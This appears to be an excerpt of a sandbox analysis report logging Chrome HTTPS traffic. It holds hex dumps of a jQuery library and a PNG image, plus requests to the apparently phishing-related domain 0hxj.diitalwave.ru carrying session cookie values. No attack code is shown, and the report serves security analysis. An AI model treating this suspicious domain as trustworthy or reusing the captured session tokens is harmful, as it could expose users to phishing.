                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-12-10 17:13:18 UTC613INHTTP/1.1 200 OK
                                    Connection: close
                                    Content-Length: 89501
                                    Server: nginx
                                    Content-Type: application/javascript; charset=utf-8
                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                    ETag: "28feccc0-15d9d"
                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                    Access-Control-Allow-Origin: *
                                    Cross-Origin-Resource-Policy: cross-origin
                                    Via: 1.1 varnish, 1.1 varnish
                                    Accept-Ranges: bytes
                                    Date: Tue, 10 Dec 2024 17:13:18 GMT
                                    Age: 2372330
                                    X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740068-EWR
                                    X-Cache: HIT, HIT
                                    X-Cache-Hits: 2774, 5
                                    X-Timer: S1733850798.162993,VS0,VE0
                                    Vary: Accept-Encoding
                                    2024-12-10 17:13:18 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                    Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                    2024-12-10 17:13:18 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                    Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                    2024-12-10 17:13:18 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                    Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                    2024-12-10 17:13:18 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                    Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                    2024-12-10 17:13:18 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                    Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                    2024-12-10 17:13:18 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                    Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    6192.168.2.749747172.217.19.2254437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-12-10 17:13:18 UTC906OUTGET /img/b/R29vZ2xl/AVvXsEgdrhY6zM7txEf61nPO67_Cl7rOyCGsyEb9GaIEqe3M-p-yN2nJeBUGCXkDygK7t8xYVcKwSgu4v0_u6EZF5srUh16p0vNl1K8hBeBV8dg-KcOpt7y8vrkamMOU2HxW0STp0JDEp21FWuCWxDXZX0EtxoLPSBWR6WwhXZglXIvWXbh24ojuyofD6htY8D4/s3396/userinter.png HTTP/1.1
                                    Host: blogger.googleusercontent.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIk6HLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: image
                                    Referer: https://0hxj.diitalwave.ru/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-12-10 17:13:20 UTC470INHTTP/1.1 200 OK
                                    Content-Type: image/png
                                    Vary: Origin
                                    Access-Control-Expose-Headers: Content-Length
                                    ETag: "v367e"
                                    Expires: Wed, 11 Dec 2024 17:13:19 GMT
                                    Cache-Control: public, max-age=86400, no-transform
                                    Content-Disposition: inline;filename="userinter.png"
                                    X-Content-Type-Options: nosniff
                                    Date: Tue, 10 Dec 2024 17:13:19 GMT
                                    Server: fife
                                    Content-Length: 87859
                                    X-XSS-Protection: 0
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                    Connection: close
                                    2024-12-10 17:13:20 UTC920INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 0d 44 00 00 07 80 08 02 00 00 00 33 3b 2b ce 00 00 00 03 73 42 49 54 08 08 08 db e1 4f e0 00 00 00 5f 7a 54 58 74 52 61 77 20 70 72 6f 66 69 6c 65 20 74 79 70 65 20 41 50 50 31 00 00 08 99 e3 4a 4f cd 4b 2d ca 4c 56 28 28 ca 4f cb cc 49 e5 52 00 03 63 13 2e 13 4b 13 4b a3 44 03 03 03 0b 03 08 30 34 30 30 36 04 92 46 40 b6 39 54 28 d1 00 05 98 98 9b a5 01 a1 b9 59 b2 99 29 88 cf 05 00 4f ba 15 68 1b 2d d8 8c 00 00 20 00 49 44 41 54 78 9c ec da 21 01 00 20 00 c0 30 a0 7f 58 04 02 49 8c 0b b6 04 0f f0 b9 cf 1d 00 00 00 00 00 00 00 00 00 40 67 d5 01 00 00 00 00 00 00 00 00 00 f0 3b 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00
                                    Data Ascii: PNGIHDRD3;+sBITO_zTXtRaw profile type APP1JOK-LV((OIRc.KKD04006F@9T(Y)Oh- IDATx! 0XI@g;3|3@
                                    2024-12-10 17:13:20 UTC1390INData Raw: 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00
                                    Data Ascii: 3@13|3@13|3@13|3@13|3@13|3
                                    2024-12-10 17:13:20 UTC1390INData Raw: 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31
                                    Data Ascii: 13|3@13|3@13|3@13|3@13|3@1
                                    2024-12-10 17:13:20 UTC1390INData Raw: 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00
                                    Data Ascii: |3@13|3@13|3@13|3@13|3@13|
                                    2024-12-10 17:13:20 UTC1390INData Raw: 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 00 00 00 00 00 00 31 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00 f0 d8 bb 9f 10 39 cf fb 80 e3 cf fb 67 fe ac 64 cb 76 40 71 da 83 9c 3f 26 14 c9 92 bd 4a 23 0c b1 72 68 c8 b1 e9 a1 89 43 b1 8a 88 15 50 a1 31 24 84 1a 92 42 08 3d e4 90 1c da a2 50 30 54 04 51 19 23 27 a7 96 d2 43 88 09 c6 2d c1 c1 5e 6b ad f5 21 b4 49 ab 43 53 67 a1 5a 39 52 b5 ab dd d9 e9 61 e3 ad ab 3f bb 3b b3 b3 fb 7b 9f 99 cf e7 60 76 77 e6 7d fd bb 8d c7 cf f7 7d 1e 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00
                                    Data Ascii: @13|3@13|3@9gdv@q?&J#rhCP1$B=P0TQ#'C-^k!ICSgZ9Ra?;{`vw}}&
                                    2024-12-10 17:13:20 UTC1390INData Raw: 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00 08 26 e6 03 00 00 00 00 00 00 00 00 80 60 62 3e 00 00 00 00 00 00 00 00 00
                                    Data Ascii: &`b>&`b>&`b>&`b>&`b>&`b>&`b>&`b>&`b>&`b>
                                    2024-12-10 17:13:20 UTC1390INData Raw: e3 c3 e7 3a 00 64 ac 28 52 d7 53 77 00 00 00 00 00 30 a9 ba ed ba 70 78 0f 00 8c 0b 31 1f 00 64 ac db aa 4b df d1 01 00 00 00 00 60 52 95 45 d1 6d 79 ec 1f 00 c6 84 98 0f 00 72 55 55 0e d8 05 00 00 00 00 80 49 d7 6e 55 55 65 e9 1f 00 c6 81 4f 74 00 c8 55 57 c9 07 00 00 00 00 00 58 32 00 80 71 21 e6 03 80 2c b5 ea b2 f6 98 1d 00 00 00 00 00 90 52 5d 95 ad da aa 01 00 64 cf c7 39 00 64 a9 d3 aa a3 47 00 00 00 00 00 00 9a c2 c2 01 00 8c 01 31 1f 00 e4 a7 55 57 55 59 44 4f 01 00 00 00 00 00 34 45 55 16 ad da 61 bb 00 90 37 31 1f 00 e4 a7 d3 f2 6d 1c 00 00 00 00 00 f8 7f 2c 1f 00 40 ee c4 7c 00 90 99 ba 2a 6d cb 07 00 00 00 00 00 dc a2 2a 8b ba d2 00 00 40 c6 7c 90 03 40 66 3c 57 07 00 00 00 00 00 dc 91 45 04 00 c8 9a 98 0f 00 72 52 7a a8 0e 00 00 00 00 00 b8
                                    Data Ascii: :d(RSw0px1dK`REmyrUUInUUeOtUWX2q!,R]d9dG1UWUYDO4EUa71m,@|*m*@|@f<WErRz
                                    2024-12-10 17:13:20 UTC1390INData Raw: 64 3a 7a 0a 00 00 00 00 00 00 00 9a 4e cc 07 00 64 23 c7 92 af 73 e2 54 f4 14 00 00 00 00 00 00 00 64 40 cc 07 00 e4 41 c9 07 00 00 00 00 00 00 c0 18 13 f3 01 00 19 50 f2 01 00 00 00 00 00 00 30 de c4 7c 00 40 d3 ad cc ce 28 f9 00 00 00 00 00 00 00 18 6f 75 f4 00 00 00 9b b8 f2 d5 d3 3b 77 f3 ee f4 b1 b5 1f da 47 a6 d7 7e b8 39 3b 93 52 5a 9c 79 75 b8 1b 2a f9 00 00 00 00 00 00 00 18 82 98 0f 00 68 b4 5f 3f fb a5 91 df b3 3b 7d 6c ea c4 a9 94 52 fd 6e c0 f7 5e 9d 94 52 4a f7 a6 94 52 5a 3a 7f 36 a5 b4 f5 7d 01 95 7c 00 00 00 00 00 00 00 0c a7 58 b8 b6 18 3d 03 00 b0 89 fb f6 76 a2 47 88 b1 74 fe ec 08 0f d8 5d 6b f8 ee 18 f0 8d 64 12 25 1f 00 00 00 00 00 8d 72 f5 fa 52 f4 08 00 c0 00 c4 7c 00 90 81 89 8d f9 e6 3f 7d 6c 24 f7 d9 4e c6 f7 5e 1b 24 7d 4a 3e
                                    Data Ascii: d:zNd#sTd@AP0|@(ou;wG~9;RZyu*h_?;}lRn^RJRZ:6}|X=vGt]kd%rR|?}l$N^$}J>
                                    2024-12-10 17:13:20 UTC1390INData Raw: ae 1f 7b 7c fe 33 2f 2f ef bd fd a5 86 6c ce 37 dc 19 bb 8f 3d 54 8f 7c 12 00 00 00 00 00 00 00 f2 22 e6 03 00 1a a4 78 e0 f1 bb bd 74 cb d1 ba b7 78 e5 ed 37 cf cd bd b8 33 43 6d d5 ec e5 de 70 67 ec 1e 7e a8 18 f9 30 00 00 00 00 00 00 00 e4 45 cc 07 00 34 c8 dd 4e da dd b8 e4 5b 73 e6 d2 85 1d 98 68 00 c3 6d cb 97 52 72 c6 2e 00 00 00 00 00 00 00 62 3e 00 a0 59 aa 0f 9d 79 ef af 97 6e 3e fc f8 fc 67 36 2d f9 d6 7c f9 c7 df dc 91 99 b6 60 e8 6d f9 8e 1e 70 c6 2e 00 00 00 00 00 00 00 62 3e 00 a0 c1 5e b8 7e ec 8b 57 0f 6e fd fd 51 87 ed ce 5e ee 7d e5 fc 8d e1 ae fd e3 4f b6 46 3b 0c 00 00 00 00 00 00 00 39 12 f3 01 00 cd b2 7e d2 ee 56 8e d6 bd dd 99 4b 17 76 bf e7 1b fa 80 dd e4 8c 5d 00 00 00 00 00 00 00 52 4a 29 39 d6 0d 00 68 9c 7f ff f0 0b 7f f3 fa
                                    Data Ascii: {|3//l7=T|"xtx73Cmpg~0E4N[shmRr.b>Yyn>g6-|`mp.b>^~WnQ^}OF;9~VKv]RJ)9h
                                    2024-12-10 17:13:20 UTC1390INData Raw: 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13 f3 01 00 00 00 00 00 00 00 00 40 30 31 1f 00 00 00 00 00 00 00 00 00 04 13
                                    Data Ascii: @01@01@01@01@01@01@01@01@01@01


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    7192.168.2.749729172.67.145.2014437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-12-10 17:13:20 UTC1329OUTGET /favicon.ico HTTP/1.1
                                    Host: 0hxj.diitalwave.ru
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: image
                                    Referer: https://0hxj.diitalwave.ru/HvdnqK-qqvXHs/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    Cookie: XSRF-TOKEN=eyJpdiI6Im4rYjdCYzFBRzNmVUJhRlh6SXpCOUE9PSIsInZhbHVlIjoiSmt4YmRVMWVxV1dPakI3SExxNFNKWko4UXRCWDZmdGFjT3g4WHVhZm4yUWZOZEFOc1l0ZWpSc0E0cjExOGZzc0RtN0p2YnNDVUdPbDlSbXBpZnhZNzRTYU51WXV1MGwzRG9GeEdLODdncmRqdVF5cldLZmtEUXFHQTNXcHhtM2ciLCJtYWMiOiJiZmMzZGZlZWFlZmE1ZWEzNzM1M2ZmMzIzODc3Mzg0NjI0NDRiYmQzYzk3MDZmNDQwY2ViNWMyNWVmZGFiYzRjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InRiWGxETFltYUxRVFFQNE9yaVArTkE9PSIsInZhbHVlIjoiNUc3ZDhCdnhiWHUxTEo1WTdNZVhVNTAvVDhxQ0hlaFo1UUs5dGdiLzZoYVV3eHRJbCtrbXJVQXpLaW8zQjIvRTdRNmM0ZFlVeWN0Vk5ZTC9BSG1oa0YxNGtFdmtHb05adlRteXdnSWdyYnFsVUVxOTlTa3pMRFdPb3g5U05EY0giLCJtYWMiOiJkMjBlNjE0NTZkOTZjY2YwNTk2YWU5NzUzZmY3NWY1NjQ4MDc5MTNhYmI2MzBjYTcxMzU5MzQ0MjUwMWUyYWY1IiwidGFnIjoiIn0%3D
                                    2024-12-10 17:13:21 UTC1073INHTTP/1.1 404 Not Found
                                    Date: Tue, 10 Dec 2024 17:13:20 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Cache-Control: max-age=14400
                                    Age: 3153
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TybKBgNVIdxCBkWTAgN3cvFtR2YstHTHIKVnBVGvu%2BkbKjPS8VvWTOFynCRaRfMXM9JxnNipYKJoSwxmEJfPaeTP%2FweuMudZWGHPsIEO97ivhO%2BhNUkB94sSw2PWUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Vary: Accept-Encoding
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1870&min_rtt=1396&rtt_var=204&sent=25&recv=22&lost=0&retrans=0&sent_bytes=23718&recv_bytes=2680&delivery_rate=6946125&cwnd=257&unsent_bytes=0&cid=b6a768cf05bc02b2&ts=17967&x=0"
                                    CF-Cache-Status: HIT
                                    Server: cloudflare
                                    CF-RAY: 8efedd7139bc43fb-EWR
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1793&min_rtt=1792&rtt_var=675&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1907&delivery_rate=1617728&cwnd=180&unsent_bytes=0&cid=99d8f212b83adcbc&ts=8264&x=0"
                                    2024-12-10 17:13:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    8192.168.2.74975935.190.80.14437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
